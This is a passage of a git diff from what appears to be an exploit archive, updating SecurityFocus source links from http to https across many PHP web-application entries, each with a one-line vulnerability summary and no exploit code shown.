vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28668.txt b/exploits/php/webapps/28668.txt index afbfe998a..6310043e3 100644 --- a/exploits/php/webapps/28668.txt +++ b/exploits/php/webapps/28668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20202/info +source: https://www.securityfocus.com/bid/20202/info   BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.   diff --git a/exploits/php/webapps/28669.txt b/exploits/php/webapps/28669.txt index e6afc0367..c744eec00 100644 --- a/exploits/php/webapps/28669.txt +++ b/exploits/php/webapps/28669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20202/info +source: https://www.securityfocus.com/bid/20202/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28670.txt b/exploits/php/webapps/28670.txt index 25764ee1a..cf29e9912 100644 --- a/exploits/php/webapps/28670.txt +++ b/exploits/php/webapps/28670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20203/info +source: https://www.securityfocus.com/bid/20203/info DanPHPSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28671.txt b/exploits/php/webapps/28671.txt index b4e8b153a..d25c1b42e 100644 --- a/exploits/php/webapps/28671.txt +++ b/exploits/php/webapps/28671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20203/info +source: https://www.securityfocus.com/bid/20203/info DanPHPSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28672.pl b/exploits/php/webapps/28672.pl index 71b982b33..3be8b53a7 100755 --- a/exploits/php/webapps/28672.pl +++ b/exploits/php/webapps/28672.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20204/info +source: https://www.securityfocus.com/bid/20204/info bbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28673.txt b/exploits/php/webapps/28673.txt index 1dbbef07b..edb580697 100644 --- a/exploits/php/webapps/28673.txt +++ b/exploits/php/webapps/28673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20205/info +source: https://www.securityfocus.com/bid/20205/info Exporia is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28674.pl b/exploits/php/webapps/28674.pl index dd89c9edc..fcdbc26d9 100755 --- a/exploits/php/webapps/28674.pl +++ b/exploits/php/webapps/28674.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20207/info +source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28675.txt b/exploits/php/webapps/28675.txt index c74438a88..424983948 100644 --- a/exploits/php/webapps/28675.txt +++ b/exploits/php/webapps/28675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20207/info +source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28676.txt b/exploits/php/webapps/28676.txt index 7cb0747cc..f49c08123 100644 --- a/exploits/php/webapps/28676.txt +++ b/exploits/php/webapps/28676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20207/info +source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28686.txt b/exploits/php/webapps/28686.txt index 956e1a866..de7606dd1 100644 --- a/exploits/php/webapps/28686.txt +++ b/exploits/php/webapps/28686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20208/info +source: https://www.securityfocus.com/bid/20208/info My-BIC is prone to a remote file-include vulnerability because these applications fail to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28687.txt b/exploits/php/webapps/28687.txt index 1d2a6fb83..f2f33bf80 100644 --- a/exploits/php/webapps/28687.txt +++ b/exploits/php/webapps/28687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28688.txt b/exploits/php/webapps/28688.txt index 47eb0e5c8..b6f691f8e 100644 --- a/exploits/php/webapps/28688.txt +++ b/exploits/php/webapps/28688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28689.txt b/exploits/php/webapps/28689.txt index fa74f8b72..17cb23377 100644 --- a/exploits/php/webapps/28689.txt +++ b/exploits/php/webapps/28689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28690.txt b/exploits/php/webapps/28690.txt index 4b2a8d47b..02893337f 100644 --- a/exploits/php/webapps/28690.txt +++ b/exploits/php/webapps/28690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28691.txt b/exploits/php/webapps/28691.txt index 71262de49..f63ed7c1e 100644 --- a/exploits/php/webapps/28691.txt +++ b/exploits/php/webapps/28691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20210/info +source: https://www.securityfocus.com/bid/20210/info Quickblogger is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28692.txt b/exploits/php/webapps/28692.txt index 3a68c6090..fabc34917 100644 --- a/exploits/php/webapps/28692.txt +++ b/exploits/php/webapps/28692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20212/info +source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28693.txt b/exploits/php/webapps/28693.txt index 431a225a9..c18785d09 100644 --- a/exploits/php/webapps/28693.txt +++ b/exploits/php/webapps/28693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20212/info +source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28694.txt b/exploits/php/webapps/28694.txt index f83ff9f0f..555185be4 100644 --- a/exploits/php/webapps/28694.txt +++ b/exploits/php/webapps/28694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20214/info +source: https://www.securityfocus.com/bid/20214/info vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28695.txt b/exploits/php/webapps/28695.txt index da7f2de53..25dc0c505 100644 --- a/exploits/php/webapps/28695.txt +++ b/exploits/php/webapps/28695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28696.txt b/exploits/php/webapps/28696.txt index b4909725b..35ed9c5d0 100644 --- a/exploits/php/webapps/28696.txt +++ b/exploits/php/webapps/28696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28697.txt b/exploits/php/webapps/28697.txt index 20b4f14d5..a37455dcc 100644 --- a/exploits/php/webapps/28697.txt +++ b/exploits/php/webapps/28697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28698.txt b/exploits/php/webapps/28698.txt index 5f78286a4..4c308c2b1 100644 --- a/exploits/php/webapps/28698.txt +++ b/exploits/php/webapps/28698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28699.txt b/exploits/php/webapps/28699.txt index e4fc84e58..c57a39fa7 100644 --- a/exploits/php/webapps/28699.txt +++ b/exploits/php/webapps/28699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28700.txt b/exploits/php/webapps/28700.txt index 4eec1d2fc..18fa0a084 100644 --- a/exploits/php/webapps/28700.txt +++ b/exploits/php/webapps/28700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28701.txt b/exploits/php/webapps/28701.txt index f68fe608f..821a7ccc8 100644 --- a/exploits/php/webapps/28701.txt +++ b/exploits/php/webapps/28701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28702.txt b/exploits/php/webapps/28702.txt index 2405e51c4..faa0057d3 100644 --- a/exploits/php/webapps/28702.txt +++ b/exploits/php/webapps/28702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28703.txt b/exploits/php/webapps/28703.txt index 08f225d36..43d7cbff8 100644 --- a/exploits/php/webapps/28703.txt +++ b/exploits/php/webapps/28703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28704.txt b/exploits/php/webapps/28704.txt index 44fa7fcd9..2c5dea681 100644 --- a/exploits/php/webapps/28704.txt +++ b/exploits/php/webapps/28704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28711.txt b/exploits/php/webapps/28711.txt index bd64f65dd..cca686ff7 100644 --- a/exploits/php/webapps/28711.txt +++ b/exploits/php/webapps/28711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20221/info +source: https://www.securityfocus.com/bid/20221/info PHP Invoice is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28714.txt b/exploits/php/webapps/28714.txt index d29631d7d..a08600b44 100644 --- a/exploits/php/webapps/28714.txt +++ b/exploits/php/webapps/28714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20231/info +source: https://www.securityfocus.com/bid/20231/info PHPSelect Web Development is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28716.txt b/exploits/php/webapps/28716.txt index a5cd6bade..0a114a293 100644 --- a/exploits/php/webapps/28716.txt +++ b/exploits/php/webapps/28716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20232/info +source: https://www.securityfocus.com/bid/20232/info MKPortal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28719.txt b/exploits/php/webapps/28719.txt index 626442914..79c6e525a 100644 --- a/exploits/php/webapps/28719.txt +++ b/exploits/php/webapps/28719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20236/info +source: https://www.securityfocus.com/bid/20236/info VirtueMart Joomla eCommerce Edition is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28720.txt b/exploits/php/webapps/28720.txt index aeab4b906..52f645ec3 100644 --- a/exploits/php/webapps/28720.txt +++ b/exploits/php/webapps/28720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20239/info +source: https://www.securityfocus.com/bid/20239/info Web//News is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28721.txt b/exploits/php/webapps/28721.txt index ad88d1d4d..234bfbacb 100644 --- a/exploits/php/webapps/28721.txt +++ b/exploits/php/webapps/28721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20243/info +source: https://www.securityfocus.com/bid/20243/info Red Mombin is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28722.txt b/exploits/php/webapps/28722.txt index 50e93ba3a..4d16612df 100644 --- a/exploits/php/webapps/28722.txt +++ b/exploits/php/webapps/28722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20243/info +source: https://www.securityfocus.com/bid/20243/info Red Mombin is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28727.txt b/exploits/php/webapps/28727.txt index af1f0930d..062f3ffa7 100644 --- a/exploits/php/webapps/28727.txt +++ b/exploits/php/webapps/28727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20259/info +source: https://www.securityfocus.com/bid/20259/info Les Visiteurs is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28728.txt b/exploits/php/webapps/28728.txt index 83bf0dde7..1ba8943b0 100644 --- a/exploits/php/webapps/28728.txt +++ b/exploits/php/webapps/28728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20272/info +source: https://www.securityfocus.com/bid/20272/info Geotarget is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28729.txt b/exploits/php/webapps/28729.txt index 345740674..cd5aaffb6 100644 --- a/exploits/php/webapps/28729.txt +++ b/exploits/php/webapps/28729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20277/info +source: https://www.securityfocus.com/bid/20277/info phpBB XS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28730.txt b/exploits/php/webapps/28730.txt index 255cee46b..caa86c594 100644 --- a/exploits/php/webapps/28730.txt +++ b/exploits/php/webapps/28730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20278/info +source: https://www.securityfocus.com/bid/20278/info OlateDownload is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28731.txt b/exploits/php/webapps/28731.txt index 43618da86..594eede80 100644 --- a/exploits/php/webapps/28731.txt +++ b/exploits/php/webapps/28731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20278/info +source: https://www.securityfocus.com/bid/20278/info OlateDownload is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28732.txt b/exploits/php/webapps/28732.txt index da2b6a907..080aa6db3 100644 --- a/exploits/php/webapps/28732.txt +++ b/exploits/php/webapps/28732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20280/info +source: https://www.securityfocus.com/bid/20280/info Yblog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28733.txt b/exploits/php/webapps/28733.txt index 21cf43722..e0a8cb476 100644 --- a/exploits/php/webapps/28733.txt +++ b/exploits/php/webapps/28733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20280/info +source: https://www.securityfocus.com/bid/20280/info Yblog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28734.txt b/exploits/php/webapps/28734.txt index 335bfacc2..3f82442d2 100644 --- a/exploits/php/webapps/28734.txt +++ b/exploits/php/webapps/28734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20280/info +source: https://www.securityfocus.com/bid/20280/info Yblog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28736.txt b/exploits/php/webapps/28736.txt index 196c1e36e..758c806f7 100644 --- a/exploits/php/webapps/28736.txt +++ b/exploits/php/webapps/28736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20292/info +source: https://www.securityfocus.com/bid/20292/info DeluxeBB is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28737.txt b/exploits/php/webapps/28737.txt index 207d299d8..5082fcbda 100644 --- a/exploits/php/webapps/28737.txt +++ b/exploits/php/webapps/28737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20295/info +source: https://www.securityfocus.com/bid/20295/info Easy Banner is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28738.txt b/exploits/php/webapps/28738.txt index a58118eca..069bf0cce 100644 --- a/exploits/php/webapps/28738.txt +++ b/exploits/php/webapps/28738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20297/info +source: https://www.securityfocus.com/bid/20297/info digiSHOP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28740.txt b/exploits/php/webapps/28740.txt index 21c4815f1..86d533694 100644 --- a/exploits/php/webapps/28740.txt +++ b/exploits/php/webapps/28740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20311/info +source: https://www.securityfocus.com/bid/20311/info HAMweather is prone to a script-code-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28741.txt b/exploits/php/webapps/28741.txt index 3bf14c445..d9d91bb11 100644 --- a/exploits/php/webapps/28741.txt +++ b/exploits/php/webapps/28741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20333/info +source: https://www.securityfocus.com/bid/20333/info Yener Haber Script is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28743.txt b/exploits/php/webapps/28743.txt index f5fa92a14..9b82cceb0 100644 --- a/exploits/php/webapps/28743.txt +++ b/exploits/php/webapps/28743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28744.txt b/exploits/php/webapps/28744.txt index 1f78c12c1..2ebe7e23a 100644 --- a/exploits/php/webapps/28744.txt +++ b/exploits/php/webapps/28744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28745.txt b/exploits/php/webapps/28745.txt index bb4842210..fd67a4069 100644 --- a/exploits/php/webapps/28745.txt +++ b/exploits/php/webapps/28745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28746.txt b/exploits/php/webapps/28746.txt index e28213fc1..80023ed2d 100644 --- a/exploits/php/webapps/28746.txt +++ b/exploits/php/webapps/28746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28747.txt b/exploits/php/webapps/28747.txt index c25834ebd..290325eba 100644 --- a/exploits/php/webapps/28747.txt +++ b/exploits/php/webapps/28747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28748.txt b/exploits/php/webapps/28748.txt index 82802b4d3..625992e4b 100644 --- a/exploits/php/webapps/28748.txt +++ b/exploits/php/webapps/28748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28749.txt b/exploits/php/webapps/28749.txt index f2a774a3b..dcd240baf 100644 --- a/exploits/php/webapps/28749.txt +++ b/exploits/php/webapps/28749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28750.txt b/exploits/php/webapps/28750.txt index f163fc91f..704e24352 100644 --- a/exploits/php/webapps/28750.txt +++ b/exploits/php/webapps/28750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28751.txt b/exploits/php/webapps/28751.txt index 8c523fef0..315958baf 100644 --- a/exploits/php/webapps/28751.txt +++ b/exploits/php/webapps/28751.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28752.txt b/exploits/php/webapps/28752.txt index 47744d33e..89c615916 100644 --- a/exploits/php/webapps/28752.txt +++ b/exploits/php/webapps/28752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28753.txt b/exploits/php/webapps/28753.txt index 04dcb3309..5bbd1d0e4 100644 --- a/exploits/php/webapps/28753.txt +++ b/exploits/php/webapps/28753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28754.txt b/exploits/php/webapps/28754.txt index d250880d3..8a1c34cc9 100644 --- a/exploits/php/webapps/28754.txt +++ b/exploits/php/webapps/28754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28755.txt b/exploits/php/webapps/28755.txt index ef4b618bf..586662c94 100644 --- a/exploits/php/webapps/28755.txt +++ b/exploits/php/webapps/28755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28756.txt b/exploits/php/webapps/28756.txt index fb5929d12..a117b86b9 100644 --- a/exploits/php/webapps/28756.txt +++ b/exploits/php/webapps/28756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28757.txt b/exploits/php/webapps/28757.txt index 8057862bd..91ba7de90 100644 --- a/exploits/php/webapps/28757.txt +++ b/exploits/php/webapps/28757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28758.txt b/exploits/php/webapps/28758.txt index 34f5bc399..903de79cb 100644 --- a/exploits/php/webapps/28758.txt +++ b/exploits/php/webapps/28758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28759.txt b/exploits/php/webapps/28759.txt index b64f2132f..1c106b7e9 100644 --- a/exploits/php/webapps/28759.txt +++ b/exploits/php/webapps/28759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28761.txt b/exploits/php/webapps/28761.txt index dc3786286..783ad0831 100644 --- a/exploits/php/webapps/28761.txt +++ b/exploits/php/webapps/28761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20350/info +source: https://www.securityfocus.com/bid/20350/info WikyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28767.txt b/exploits/php/webapps/28767.txt index 3153b728b..74700e230 100644 --- a/exploits/php/webapps/28767.txt +++ b/exploits/php/webapps/28767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20372/info +source: https://www.securityfocus.com/bid/20372/info ackerTodo is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28769.txt b/exploits/php/webapps/28769.txt index 4d66a4f6b..5fbb8fd40 100644 --- a/exploits/php/webapps/28769.txt +++ b/exploits/php/webapps/28769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20380/info +source: https://www.securityfocus.com/bid/20380/info Interspire FastFind is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28770.txt b/exploits/php/webapps/28770.txt index 065004cec..0a033e5cf 100644 --- a/exploits/php/webapps/28770.txt +++ b/exploits/php/webapps/28770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20395/info +source: https://www.securityfocus.com/bid/20395/info Moodle is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28771.pl b/exploits/php/webapps/28771.pl index e3b14b478..3f0fcee42 100755 --- a/exploits/php/webapps/28771.pl +++ b/exploits/php/webapps/28771.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20398/info +source: https://www.securityfocus.com/bid/20398/info PHP Polling Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28772.txt b/exploits/php/webapps/28772.txt index c8262a7e0..74d910f3d 100644 --- a/exploits/php/webapps/28772.txt +++ b/exploits/php/webapps/28772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20401/info +source: https://www.securityfocus.com/bid/20401/info iSearch is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28773.txt b/exploits/php/webapps/28773.txt index 62a5a5b4f..72a11a15d 100644 --- a/exploits/php/webapps/28773.txt +++ b/exploits/php/webapps/28773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20402/info +source: https://www.securityfocus.com/bid/20402/info Deep CMS is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28774.txt b/exploits/php/webapps/28774.txt index 507be6b1c..8d894a634 100644 --- a/exploits/php/webapps/28774.txt +++ b/exploits/php/webapps/28774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20412/info +source: https://www.securityfocus.com/bid/20412/info phpWebSite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28776.txt b/exploits/php/webapps/28776.txt index 93e3358a3..788c31bf7 100644 --- a/exploits/php/webapps/28776.txt +++ b/exploits/php/webapps/28776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20420/info +source: https://www.securityfocus.com/bid/20420/info eXpBlog is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28777.txt b/exploits/php/webapps/28777.txt index 6cf2dbf4d..a7fed78b4 100644 --- a/exploits/php/webapps/28777.txt +++ b/exploits/php/webapps/28777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20424/info +source: https://www.securityfocus.com/bid/20424/info Hastymail is prone to an IMAP / SMTP command-injection 